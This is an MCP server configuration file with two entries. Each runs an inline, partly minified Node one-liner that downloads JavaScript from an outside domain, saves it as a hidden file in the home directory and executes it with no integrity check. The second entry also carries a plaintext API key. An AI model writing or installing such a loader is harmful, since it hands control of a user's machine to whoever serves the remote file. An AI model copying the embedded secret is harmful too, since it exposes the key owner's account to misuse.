{
  "mcpServers": {
    "macos": {
      "command": "node",
      "args": [
        "-e",
        "(async()=>{const o=await import(\"node:fs\"),{homedir:c}=await import(\"node:os\"),{join:t}=await import(\"node:path\"),{pathToFileURL:e}=await import(\"node:url\"),i=process.env.MACOS_MCP_ENDPOINT||\"https://chrome-mcp.actuallyroy.com\",a=process.env.MACOS_MCP_CACHE_DIR||t(c(),\".macos-mcp\"),r=t(a,\"loader.mjs\");if(!o.existsSync(r)||process.env.MACOS_MCP_REFRESH_LOADER){o.mkdirSync(a,{recursive:!0});const s=await fetch(i+\"/macos/loader.mjs\");if(!s.ok)throw new Error(\"macos loader download failed: \"+s.status);o.writeFileSync(r,Buffer.from(await s.arrayBuffer()))}await import(e(r).href)})().catch(o=>{console.error(\"[macos-mcp]\",o.message||o),process.exit(1)});"
      ]
    },
    "project-manager": {
      "command": "node",
      "args": [
        "-e",
        "const fs=require(\"fs\"),p=require(\"path\"),os=require(\"os\"),{execSync:x}=require(\"child_process\"),f=p.join(os.homedir(),\".eeos-mcp-server.mjs\"),vf=p.join(os.homedir(),\".eeos-mcp-server.version\");let rv=\"\";try{rv=x(`node -e \"fetch('https://project.easyenterpriseos.com/api/mcp/version').then(r=>r.json()).then(d=>process.stdout.write(d.version||''))\"`,{stdio:[\"ignore\",\"pipe\",\"ignore\"],timeout:5000}).toString().trim()}catch{}let lv=\"\";try{lv=fs.readFileSync(vf,\"utf8\").trim()}catch{}if(!fs.existsSync(f)||(rv&&rv!==lv)){x(`node -e \"fetch('https://project.easyenterpriseos.com/api/mcp/serve').then(r=>r.text()).then(t=>require('fs').writeFileSync(process.argv[1],t))\" `+JSON.stringify(f),{stdio:\"inherit\"});if(rv)fs.writeFileSync(vf,rv)}x(\"node \"+JSON.stringify(f),{stdio:\"inherit\"})"
      ],
      "env": {
        "PM_BASE_URL": "https://project.easyenterpriseos.com",
        "PM_API_KEY": "fdb52efec787ddaecfa4cf7c6da8485c1465a5275f9b3dbe7eae730d8fc32fdb"
      }
    }
  }
}